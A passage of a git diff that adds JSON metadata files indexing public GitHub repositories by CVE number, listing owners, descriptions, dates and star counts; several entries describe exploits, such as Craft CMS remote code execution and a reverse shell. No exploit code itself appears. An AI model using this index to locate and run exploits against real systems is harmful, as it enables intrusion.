+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41534.json b/2023/CVE-2023-41534.json
new file mode 100644
index 0000000000..218362e1a4
--- /dev/null
+++ b/2023/CVE-2023-41534.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 688439636,
+ "name": "CVE-2023-41534",
+ "full_name": "Sh33talUmath\/CVE-2023-41534",
+ "owner": {
+ "login": "Sh33talUmath",
+ "id": 144338561,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144338561?v=4",
+ "html_url": "https:\/\/github.com\/Sh33talUmath"
+ },
+ "html_url": "https:\/\/github.com\/Sh33talUmath\/CVE-2023-41534",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-07T10:58:32Z",
+ "updated_at": "2023-09-07T10:58:32Z",
+ "pushed_at": "2023-09-07T10:59:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41535.json b/2023/CVE-2023-41535.json
new file mode 100644
index 0000000000..4fbe664070
--- /dev/null
+++ b/2023/CVE-2023-41535.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 688440471,
+ "name": "CVE-2023-41535",
+ "full_name": "Sh33talUmath\/CVE-2023-41535",
+ "owner": {
+ "login": "Sh33talUmath",
+ "id": 144338561,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144338561?v=4",
+ "html_url": "https:\/\/github.com\/Sh33talUmath"
+ },
+ "html_url": "https:\/\/github.com\/Sh33talUmath\/CVE-2023-41535",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-07T11:01:04Z",
+ "updated_at": "2023-09-07T11:01:05Z",
+ "pushed_at": "2023-09-07T11:01:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41575.json b/2023/CVE-2023-41575.json
new file mode 100644
index 0000000000..4bb9362e0d
--- /dev/null
+++ b/2023/CVE-2023-41575.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 683348712,
+ "name": "Stored-xss",
+ "full_name": "soundarkutty\/Stored-xss",
+ "owner": {
+ "login": "soundarkutty",
+ "id": 26168410,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26168410?v=4",
+ "html_url": "https:\/\/github.com\/soundarkutty"
+ },
+ "html_url": "https:\/\/github.com\/soundarkutty\/Stored-xss",
+ "description": "Got My CVE Published CVE-2023-41575",
+ "fork": false,
+ "created_at": "2023-08-26T09:26:35Z",
+ "updated_at": "2023-09-23T06:43:31Z",
+ "pushed_at": "2023-09-23T06:43:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41592.json b/2023/CVE-2023-41592.json
new file mode 100644
index 0000000000..3ed0593def
--- /dev/null
+++ b/2023/CVE-2023-41592.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 786209842,
+ "name": "CVE-2023-41592-2",
+ "full_name": "miguelc49\/CVE-2023-41592-2",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-41592-2",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:46:32Z",
+ "updated_at": "2024-04-14T17:40:42Z",
+ "pushed_at": "2024-04-14T17:40:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786209864,
+ "name": "CVE-2023-41592-1",
+ "full_name": "miguelc49\/CVE-2023-41592-1",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-41592-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:46:36Z",
+ "updated_at": "2024-04-14T17:40:35Z",
+ "pushed_at": "2024-04-14T17:40:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786209884,
+ "name": "CVE-2023-41592-3",
+ "full_name": "miguelc49\/CVE-2023-41592-3",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-41592-3",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:46:40Z",
+ "updated_at": "2024-04-22T17:46:16Z",
+ "pushed_at": "2024-04-22T17:46:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41593.json b/2023/CVE-2023-41593.json
new file mode 100644
index 0000000000..9a4b75e87e
--- /dev/null
+++ b/2023/CVE-2023-41593.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 688347969,
+ "name": "CVE",
+ "full_name": "MATRIXDEVIL\/CVE",
+ "owner": {
+ "login": "MATRIXDEVIL",
+ "id": 92071491,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92071491?v=4",
+ "html_url": "https:\/\/github.com\/MATRIXDEVIL"
+ },
+ "html_url": "https:\/\/github.com\/MATRIXDEVIL\/CVE",
+ "description": "CVE-2023-41593",
+ "fork": false,
+ "created_at": "2023-09-07T06:59:09Z",
+ "updated_at": "2023-09-07T06:59:10Z",
+ "pushed_at": "2023-09-07T07:11:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41613.json b/2023/CVE-2023-41613.json
new file mode 100644
index 0000000000..8f71dc57b8
--- /dev/null
+++ b/2023/CVE-2023-41613.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 684143893,
+ "name": "cve-2023-41613",
+ "full_name": "Eafz\/cve-2023-41613",
+ "owner": {
+ "login": "Eafz",
+ "id": 55439965,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55439965?v=4",
+ "html_url": "https:\/\/github.com\/Eafz"
+ },
+ "html_url": "https:\/\/github.com\/Eafz\/cve-2023-41613",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-28T14:45:23Z",
+ "updated_at": "2023-12-08T00:33:13Z",
+ "pushed_at": "2023-12-05T06:44:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41623.json b/2023/CVE-2023-41623.json
new file mode 100644
index 0000000000..7fc6ac269f
--- /dev/null
+++ b/2023/CVE-2023-41623.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 728954859,
+ "name": "wuhaozhe-s-CVE",
+ "full_name": "GhostBalladw\/wuhaozhe-s-CVE",
+ "owner": {
+ "login": "GhostBalladw",
+ "id": 136776282,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136776282?v=4",
+ "html_url": "https:\/\/github.com\/GhostBalladw"
+ },
+ "html_url": "https:\/\/github.com\/GhostBalladw\/wuhaozhe-s-CVE",
+ "description": "CVE-2023-41623",
+ "fork": false,
+ "created_at": "2023-12-08T04:15:06Z",
+ "updated_at": "2023-12-08T04:15:06Z",
+ "pushed_at": "2023-12-15T07:53:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41646.json b/2023/CVE-2023-41646.json
new file mode 100644
index 0000000000..76fe631e60
--- /dev/null
+++ b/2023/CVE-2023-41646.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 686063462,
+ "name": "CVE-2023-41646",
+ "full_name": "tristao-marinho\/CVE-2023-41646",
+ "owner": {
+ "login": "tristao-marinho",
+ "id": 101610912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4",
+ "html_url": "https:\/\/github.com\/tristao-marinho"
+ },
+ "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-41646",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-01T16:46:07Z",
+ "updated_at": "2023-09-01T16:46:07Z",
+ "pushed_at": "2023-09-01T16:51:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4165.json b/2023/CVE-2023-4165.json
new file mode 100644
index 0000000000..c7e06dd7e3
--- /dev/null
+++ b/2023/CVE-2023-4165.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 685807414,
+ "name": "CVE-2023-4165",
+ "full_name": "mvpyyds\/CVE-2023-4165",
+ "owner": {
+ "login": "mvpyyds",
+ "id": 87457452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87457452?v=4",
+ "html_url": "https:\/\/github.com\/mvpyyds"
+ },
+ "html_url": "https:\/\/github.com\/mvpyyds\/CVE-2023-4165",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-01T03:55:23Z",
+ "updated_at": "2023-09-01T03:56:08Z",
+ "pushed_at": "2023-09-01T05:31:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4166.json b/2023/CVE-2023-4166.json
new file mode 100644
index 0000000000..6bccf21b3c
--- /dev/null
+++ b/2023/CVE-2023-4166.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 685829767,
+ "name": "CVE-2023-4166",
+ "full_name": "mvpyyds\/CVE-2023-4166",
+ "owner": {
+ "login": "mvpyyds",
+ "id": 87457452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87457452?v=4",
+ "html_url": "https:\/\/github.com\/mvpyyds"
+ },
+ "html_url": "https:\/\/github.com\/mvpyyds\/CVE-2023-4166",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-01T05:33:38Z",
+ "updated_at": "2023-10-12T07:15:33Z",
+ "pushed_at": "2023-09-01T05:36:57Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4169.json b/2023/CVE-2023-4169.json
new file mode 100644
index 0000000000..a22724c144
--- /dev/null
+++ b/2023/CVE-2023-4169.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 705480946,
+ "name": "CVE-2023-4169_CVE-2023-3306_CVE-2023-4415",
+ "full_name": "thedarknessdied\/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415",
+ "owner": {
+ "login": "thedarknessdied",
+ "id": 56123966,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56123966?v=4",
+ "html_url": "https:\/\/github.com\/thedarknessdied"
+ },
+ "html_url": "https:\/\/github.com\/thedarknessdied\/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415",
+ "description": "Ruijie-RG-EW1200G CVE-2023-4169_CVE-2023-3306_CVE-2023-4415",
+ "fork": false,
+ "created_at": "2023-10-16T05:08:06Z",
+ "updated_at": "2024-06-22T20:09:10Z",
+ "pushed_at": "2023-10-18T12:27:17Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41717.json b/2023/CVE-2023-41717.json
new file mode 100644
index 0000000000..1a3840da4c
--- /dev/null
+++ b/2023/CVE-2023-41717.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 685433459,
+ "name": "CVE-2023-41717",
+ "full_name": "federella\/CVE-2023-41717",
+ "owner": {
+ "login": "federella",
+ "id": 38486839,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38486839?v=4",
+ "html_url": "https:\/\/github.com\/federella"
+ },
+ "html_url": "https:\/\/github.com\/federella\/CVE-2023-41717",
+ "description": "This repository is to provide a write-up and PoC for CVE-2023-41717.",
+ "fork": false,
+ "created_at": "2023-08-31T08:10:22Z",
+ "updated_at": "2024-02-12T10:59:24Z",
+ "pushed_at": "2023-08-31T09:51:35Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4174.json b/2023/CVE-2023-4174.json
new file mode 100644
index 0000000000..df6a7e6731
--- /dev/null
+++ b/2023/CVE-2023-4174.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 677308989,
+ "name": "CVE-2023-4174",
+ "full_name": "d0rb\/CVE-2023-4174",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-4174",
+ "description": "CVE-2023-4174 PoC",
+ "fork": false,
+ "created_at": "2023-08-11T08:48:02Z",
+ "updated_at": "2023-08-11T08:48:49Z",
+ "pushed_at": "2023-08-11T08:48:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41772.json b/2023/CVE-2023-41772.json
new file mode 100644
index 0000000000..99041a26c8
--- /dev/null
+++ b/2023/CVE-2023-41772.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733456895,
+ "name": "CVE-2023-41772",
+ "full_name": "R41N3RZUF477\/CVE-2023-41772",
+ "owner": {
+ "login": "R41N3RZUF477",
+ "id": 63357997,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63357997?v=4",
+ "html_url": "https:\/\/github.com\/R41N3RZUF477"
+ },
+ "html_url": "https:\/\/github.com\/R41N3RZUF477\/CVE-2023-41772",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-19T11:21:12Z",
+ "updated_at": "2024-05-16T06:46:13Z",
+ "pushed_at": "2023-12-24T10:47:00Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41892.json b/2023/CVE-2023-41892.json
new file mode 100644
index 0000000000..4b28458c42
--- /dev/null
+++ b/2023/CVE-2023-41892.json
@@ -0,0 +1,126 @@
+[
+ {
+ "id": 701130009,
+ "name": "CVE-2023-41892",
+ "full_name": "zaenhaxor\/CVE-2023-41892",
+ "owner": {
+ "login": "zaenhaxor",
+ "id": 83585135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83585135?v=4",
+ "html_url": "https:\/\/github.com\/zaenhaxor"
+ },
+ "html_url": "https:\/\/github.com\/zaenhaxor\/CVE-2023-41892",
+ "description": "CVE-2023-41892 - Craft CMS Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2023-10-06T01:40:34Z",
+ "updated_at": "2024-01-26T13:35:20Z",
+ "pushed_at": "2023-10-07T03:26:00Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736015392,
+ "name": "CraftCMS_CVE-2023-41892",
+ "full_name": "Faelian\/CraftCMS_CVE-2023-41892",
+ "owner": {
+ "login": "Faelian",
+ "id": 4268373,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4268373?v=4",
+ "html_url": "https:\/\/github.com\/Faelian"
+ },
+ "html_url": "https:\/\/github.com\/Faelian\/CraftCMS_CVE-2023-41892",
+ "description": "Exploit for CVE-2023-41892",
+ "fork": false,
+ "created_at": "2023-12-26T18:31:27Z",
+ "updated_at": "2024-05-29T12:17:49Z",
+ "pushed_at": "2023-12-26T22:39:21Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749723508,
+ "name": "Craft-CMS-Exploit",
+ "full_name": "diegaccio\/Craft-CMS-Exploit",
+ "owner": {
+ "login": "diegaccio",
+ "id": 152712974,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152712974?v=4",
+ "html_url": "https:\/\/github.com\/diegaccio"
+ },
+ "html_url": "https:\/\/github.com\/diegaccio\/Craft-CMS-Exploit",
+ "description": "CVE-2023-41892 Reverse Shell",
+ "fork": false,
+ "created_at": "2024-01-29T09:12:59Z",
+ "updated_at": "2024-02-23T05:32:56Z",
+ "pushed_at": "2024-02-01T21:38:58Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "craftcms",
+ "cve-2023-41892",
+ "reverse-shell"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 763685345,
+ "name": "CVE-2023-41892",
+ "full_name": "acesoyeo\/CVE-2023-41892",
+ "owner": {
+ "login": "acesoyeo",
+ "id": 127269737,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127269737?v=4",
+ "html_url": "https:\/\/github.com\/acesoyeo"
+ },
+ "html_url": "https:\/\/github.com\/acesoyeo\/CVE-2023-41892",
+ "description": "A Craft CMS vulnerability that allows Remote Code Execution (RCE).",
+ "fork": false,
+ "created_at": "2024-02-26T18:31:46Z",
+ "updated_at": "2024-02-26T18:34:15Z",
+ "pushed_at": "2024-02-26T19:14:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4197.json b/2023/CVE-2023-4197.json
new file mode 100644
index 0000000000..e63995da9b
--- /dev/null
+++ b/2023/CVE-2023-4197.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 805950324,
+ "name": "CVE-2023-4197",
+ "full_name": "alien-keric\/CVE-2023-4197",
+ "owner": {
+ "login": "alien-keric",
+ "id": 102582785,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102582785?v=4",
+ "html_url": "https:\/\/github.com\/alien-keric"
+ },
+ "html_url": "https:\/\/github.com\/alien-keric\/CVE-2023-4197",
+ "description": "this is a simple script from CVE-2023-4197 that was little bit modified since because it didn't work at first time with broadlight machine from HTB which means that we have to modify the script a little bit and then use it as how the ducumentation says",
+ "fork": false,
+ "created_at": "2024-05-25T23:45:30Z",
+ "updated_at": "2024-05-25T23:51:46Z",
+ "pushed_at": "2024-05-25T23:51:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41991.json b/2023/CVE-2023-41991.json
new file mode 100644
index 0000000000..9be79440a4
--- /dev/null
+++ b/2023/CVE-2023-41991.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724861098,
+ "name": "CVE-2023-41991",
+ "full_name": "Zenyith\/CVE-2023-41991",
+ "owner": {
+ "login": "Zenyith",
+ "id": 119261527,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119261527?v=4",
+ "html_url": "https:\/\/github.com\/Zenyith"
+ },
+ "html_url": "https:\/\/github.com\/Zenyith\/CVE-2023-41991",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-28T23:59:40Z",
+ "updated_at": "2024-01-07T07:03:42Z",
+ "pushed_at": "2023-11-28T00:53:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-41993.json b/2023/CVE-2023-41993.json
new file mode 100644
index 0000000000..23cb975d5c
--- /dev/null
+++ b/2023/CVE-2023-41993.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 705224501,
+ "name": "POC-for-CVE-2023-41993",
+ "full_name": "po6ix\/POC-for-CVE-2023-41993",
+ "owner": {
+ "login": "po6ix",
+ "id": 61380567,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61380567?v=4",
+ "html_url": "https:\/\/github.com\/po6ix"
+ },
+ "html_url": "https:\/\/github.com\/po6ix\/POC-for-CVE-2023-41993",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-15T12:14:18Z",
+ "updated_at": "2024-06-26T05:33:30Z",
+ "pushed_at": "2024-03-08T12:57:53Z",
+ "stargazers_count": 188,
+ "watchers_count": 188,
+ "has_discussions": false,
+ "forks_count": 34,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 34,
+ "watchers": 188,
+ "score": 0,
+ "subscribers_count": 10
+ },
+ {
+ "id": 705738898,
+ "name": "cve-2023-41993-test",
+ "full_name": "hrtowii\/cve-2023-41993-test",
+ "owner": {
+ "login": "hrtowii",
+ "id": 68852354,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68852354?v=4",
+ "html_url": "https:\/\/github.com\/hrtowii"
+ },
+ "html_url": "https:\/\/github.com\/hrtowii\/cve-2023-41993-test",
+ "description": "testing poc",
+ "fork": false,
+ "created_at": "2023-10-16T15:43:50Z",
+ "updated_at": "2024-03-19T03:15:06Z",
+ "pushed_at": "2023-10-18T17:58:35Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 707881504,
+ "name": "cve-test",
+ "full_name": "Mangaia\/cve-test",
+ "owner": {
+ "login": "Mangaia",
+ "id": 21020827,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21020827?v=4",
+ "html_url": "https:\/\/github.com\/Mangaia"
+ },
+ "html_url": "https:\/\/github.com\/Mangaia\/cve-test",
+ "description": "testing cve-2023-41993-test",
+ "fork": false,
+ "created_at": "2023-10-20T22:04:40Z",
+ "updated_at": "2023-10-20T22:04:41Z",
+ "pushed_at": "2023-10-20T22:04:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 764522978,
+ "name": "CVE-2023-41993",
+ "full_name": "J3Ss0u\/CVE-2023-41993",
+ "owner": {
+ "login": "J3Ss0u",
+ "id": 90192954,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90192954?v=4",
+ "html_url": "https:\/\/github.com\/J3Ss0u"
+ },
+ "html_url": "https:\/\/github.com\/J3Ss0u\/CVE-2023-41993",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-28T08:27:43Z",
+ "updated_at": "2024-02-28T08:32:07Z",
+ "pushed_at": "2024-02-28T08:38:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4206.json b/2023/CVE-2023-4206.json
new file mode 100644
index 0000000000..ee27db8ae1
--- /dev/null
+++ b/2023/CVE-2023-4206.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 731880804,
+ "name": "Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208",
+ "full_name": "hshivhare67\/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-15T05:13:24Z",
+ "updated_at": "2023-12-15T05:18:44Z",
+ "pushed_at": "2023-12-15T12:57:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
